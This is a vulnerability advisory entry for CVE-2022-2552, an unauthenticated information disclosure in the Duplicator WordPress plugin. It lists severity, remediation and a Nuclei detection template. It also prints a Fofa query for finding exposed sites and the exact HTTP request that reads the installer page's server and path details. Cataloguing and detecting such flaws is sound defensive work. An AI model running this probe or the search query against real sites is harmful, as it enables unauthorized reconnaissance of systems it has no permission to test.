🔙 목록으로 돌아가기

CVE-2022-2552: Duplicator < 1.4.7.1 - Information Disclosure

TitleDuplicator < 1.4.7.1 - Information Disclosure
Authoriamnoooob,ritikchaddha
SeverityMedium
ImpactUnauthenticated attackers can access sensitive system information including server software versions, PHP version, and full filesystem paths through the exposed installer endpoint, providing valuable reconnaissance data for targeted attacks.
RemediationUpdate Duplicator plugin to version 1.4.7.1 or later that requires authentication before displaying system information.
CVSS Score5.3
EPSS Score0.48477
CVE IDCVE-2022-2552
CWE IDCWE-862
Fofa Querybody="/wp-content/plugins/duplicator"
Tags cve cve2022 wp wp-plugin wordpress duplicator disclosure vuln

🔍 Vulnerability Description

The Duplicator WordPress plugin before 1.4.7 does not authenticate or authorize visitors before displaying information about the system such as server software, php version and full file system path to the site.

🌐 HTTP Request

GET /wp-content/backups-dup-lite/dup-installer/main.installer.php?view=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-2552.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-2552.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A